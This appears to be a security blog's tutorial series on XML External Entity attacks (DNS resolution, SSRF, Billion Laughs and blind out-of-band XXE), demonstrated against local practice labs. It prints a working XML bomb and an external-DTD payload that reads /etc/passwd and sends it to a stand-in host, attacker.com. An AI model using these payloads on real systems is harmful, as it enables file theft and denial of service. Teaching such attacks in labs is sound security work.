Thursday, August 1, 2019

XML External Entities - DNS Resolution - Part VI

XXE Attack -


Hi guys!! This is the last Part for XXE which talks about the DNS Resolution through XML External Entities.

What is DNS Resolution?

Each web server has a unique IP Address in textual form. DNS (Domain Name Server) Resolution is a process of translating an IP Address to domain names. This process is also known as DNS lookup.
When you type in a web address, e.g., jagskap.blogspot.com, your Internet Service Provider views the DNS associated with the domain name, translates it into a machine friendly IP address (for example 216.58.196.193 is the IP for jagskap.blogspot.com) and directs your Internet connection to the correct website. 
Note: Not all IP addresses can be resolved. There is a hierarchy to DNS servers. If the first DNS server cannot resolve the IP address, a call is made to another DNS server to find it. It continues this process until it times out.

DNS Resolution through XXE

The attack is very similar to Out of Band XXE. The only difference between Out of Band XXE and DNS Resolution is that in DNS Resolution the server only resolves the Domain name but no GET/POST request is made. Below is a practical demonstration for the same.

Demo

Again for the demonstration purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/.

Exhibit 1

Step 2: Intercept the request using a proxy tool like Burp Suite. Click on Burp → Burp Collaborator Client → Copy to Clipboard as shown in Exhibit 2.


Exhibit 2

Bingo!! Exhibit 2 shows that the burp collaborator receives a DNS Request from the server.


I hope you enjoyed the blog. Please share and comment.

XML External Entities - SSRF - Part V

XXE Attack -


Hi guys, I hope you have gone through the previous part of XXE. This post talks about the working of SSRF(Server Side Request Forgery) through XXE  attack along with a practical demonstration. Before we get into the attack let us understand about SSRF.

What is Server-Side Request Forgery (SSRF)?

Server-Side Request Forgery (SSRF) is considered slightly unknown attack, and most people confuse how the attack actually works. SSRF vulnerability allows an attacker to craft a request from the back-end server of a vulnerable web application.


Let’s take a moment to understand where the vulnerability resides. It is common for any online application to include external resources for its functioning. For example, to share this post on Twitter, for example, the Twitter server would need to make a request to this page in order to extract all the information it needs, like the images and description. The vulnerability lies in this link expansion and Twitter, too, was vulnerable to SSRF until recently. As I’ve already mentioned, SSRF attacks target internal protected systems that would not be accessible to an attacker through the external network. Additionally, an attacker can also leverage SSRF attack to access services from the victim server itself that is listening on the loopback interface (127.0.0.1).

Perform SSRF through XXE

There is a very simple difference between Out of Band XXE and SSRF through XXE i.e. when the attacker’s server receives a GET/HTTP request from the target server but does not read the file, we call it as SSRF through XXE. An attacker uses the vulnerable server as a medium to perform Denial of Service attack on the actual target. Below is a practical demonstration of the same.

Demo

For demo purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/ as shown in Exhibit 1.

Exhibit 1

Step 2: Intercept the request using a proxy tool like Burp Suite. Click on Burp → Burp Collaborator Client → Copy to Clipboard as shown in Exhibit 2.

Exhibit 2

Exhibit 2 shows that the burp collaborator receives an HTTP request from the server.


I hope you enjoyed reading this. The next part is the last Part i.e. XML External Entities - DNS Resolution - Part VI. Please like, share and comment. 

References

https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
https://www.winmill.com/News/Security-News/What-is-Server-Side-Request-Forgery-SSRF.aspx

XML External Entities - Billion Laughter Attack - Part IV

XXE Attack -


Hi Techmates, this blog is all about the famous Billion Laughter Attack. In this blog, we will discuss what this attack is and how this attack can lead to a Denial of Service (DOS) attack with a practical demonstration. 

What is Billion Laughter Attack?

Billion Laughter Attack is a type of Denial of Service (DOS) Attack that targets XML parsers. The Billion Laughter Attack is also known as an XML bomb. A Billion Laughs Attack can occur even when using well-formed XML and can also pass XML schema validation.


For Example:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>


In the above example, there are five different XML Entities i.e., lol, lol2, lol3, lol4, lol5. The variable “lol” contains the value “lol”. Likewise, the variable “lol2” contains the value of “lol”*4 times and the same goes till “lol5”. The document content section of this XML file contains a reference to only one instance of the entity lol5. However, when this is being parsed by the parser - lol5 is encountered, it is expanded into 4 lol4s, each of which is expanded into 4 lol3s, and so on and so forth. By the time everything is expanded to the text lol, there are many instances of the string "lol". Thus if the instance could encounter Billion “lol”s, hence the name of the attack. This many expansion consumes an exponential amount of resources and time, causing the DOS.

Demo

For demo purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/ and fill all the details as shown in Exhibit 1.

Exhibit 1

Step 2: Intercept the request using a proxy tool such as Burpsuite as shown in Exhibit 2.


Exhibit 2

Step 3: Enter the XML Code in the Burpsuite as shown in Exhibit 3. It can be observed that the application responds with “lollol……” as expected.


Exhibit 3

Step 4: Add more XML Entity to perform a DOS Attack as shown in Exhibit 4. 


Exhibit 4

Bingo!!! It can be observed that the application does not respond.


I hope you guys liked this blog. If you have any queries please leave the comment below. Like and Share. Go through the XML External Entities - SSRF - Part V to know how you can perform SSRF through XXE.


References

https://www.thesecuritybuddy.com/dos-ddos-prevention/what-is-billion-laughs-attack/

XML External Entities - Out of band - Part III

XXE Attack -


Hi Techies!! In XML External Entities - Inband - Part II, we discussed the Inband XXE Attack. In this part, we will be discussing Out of Band XXE Attack along with an example which would illustrate the attack in detail.

What is Out of Band?

Out of Band XXE (also called Blind XXE) attacks are the attack in which an attacker does not get immediate response from the server. The exploitation process of Out of Band is similar to Inband i.e., using parameter entities, which also involves the creation of an external DTD (Document Type Definition). The major difference between these two attacks is - in Out of Band the attacker uses an XML parser to make an additional request to the attacker's webserver to read the contents of the local file.


For example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://attacker.com/jagskap.dtd">
<data>&e1;</data>


jagskap.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker.com/jagskap?%p1;'>">
%p2;


The Out of Bound XXE Attack is conducted as follows:
  • First, the XML parser makes a request to the attacker's DTD file at http://attacker.com/jagskap.dtd.
  • After the jagskap.dtd file is fetched, the %p1 entity is processed by XML Parser, which loads the content of /etc/passwd file in p1.
  • The %p2 entity creates a general entity called &e1, which contains a URL. This URL includes the file contents of p1. The URL looks like http://attacker.com/jagskap?root:!:0:0::/:/usr/bin/sh...
  • Finally, after the URL is constructed, the XML parser processes the &e1 entity, which makes a request to the attacker's server.
  • The attacker can log the request on their end and reconstruct the file from the log entry.


DEMO


For the demo purpose, we will be using Pentesterlab ISO. You can download the ISO file from https://pentesterlab.com/exercises/play_xxe/iso.


Step 1: Run the ISO file in the Virtual Box and check the IP Address.
  • Target - 192.168.56.102
Step 2: Now with the attacker machine navigate to http://192.168.56.102/login.


Exhibit 1

Step 3:  Intercept the request using a proxy tool like BurpSuite as shown in Exhibit 2.


Exhibit 2

Step 4: Let us check if the application is vulnerable to XXE Injection. To do so, let us modify the request by changing the Content-type to text/xml and add xml data in the POST request as shown in Exhibit 3.

Exhibit 3

It can be observed that the application server responds with Invalid XML telling that the server parses XML. The only issue is that we don't have any data that is being reflected from the server-side making it blind based attack. So even if we request /etc/passwd file from the server, the server won't send it in response. Thus we need to find another way. Here, an External DTD plays an important role. We will make use of external DTD to get /etc/passwd file.

Step 5: Create a DTD file named “jagskap.dtd” with the content as shown in Exhibit 4 and host the file in the attacker’s server using Xampp or Apache.


Exhibit 4

Step 6:  Finally, we need to send the XML entity payload, as shown in Exhibit 5.


Exhibit 5

Step 7: When executed we can see that the target server makes and request to the attacker’s server as was intended and dumps the /etc/passwd file content in the request as shown in the Exhibit 6.


Exhibit 6

Step 7: Further, we can view the other files and directories as well. To do so, go back to the content of /etc/passwd file, we can see that a play user exists. The home directory of this user is /opt/play-2.1.3/xxe/ as shown in Exhibit 7, there is a good chance that it’s where the application is located.


Exhibit 7

Step 8: Depending on the XML parser, it's also possible to retrieve the listing of a directory. The only way to see if it works is to try. Here we can modify the DTD file to point to /opt/play-2.1.3/xxe/ as shown in Exhibit 8.


Exhibit 8

Step 9: Let us send this request to the server as shown in Exhibit 9.


Exhibit 9

Step 11: Bingo!!!! The content of the directory is being displayed as a part of the request as shown in Exhibit 10.


Exhibit 10


I hope this blog helped you clear your concept of Out of Band XXE. XML External Entities - Billion Laughter Attack - Part IV talks about how XXE can be used for Denial of Service Attack. To know more about Billion Laughter Attack please view XML External Entities - Billion Laughter Attack - Part IV. Please like, share and comment.

References

https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/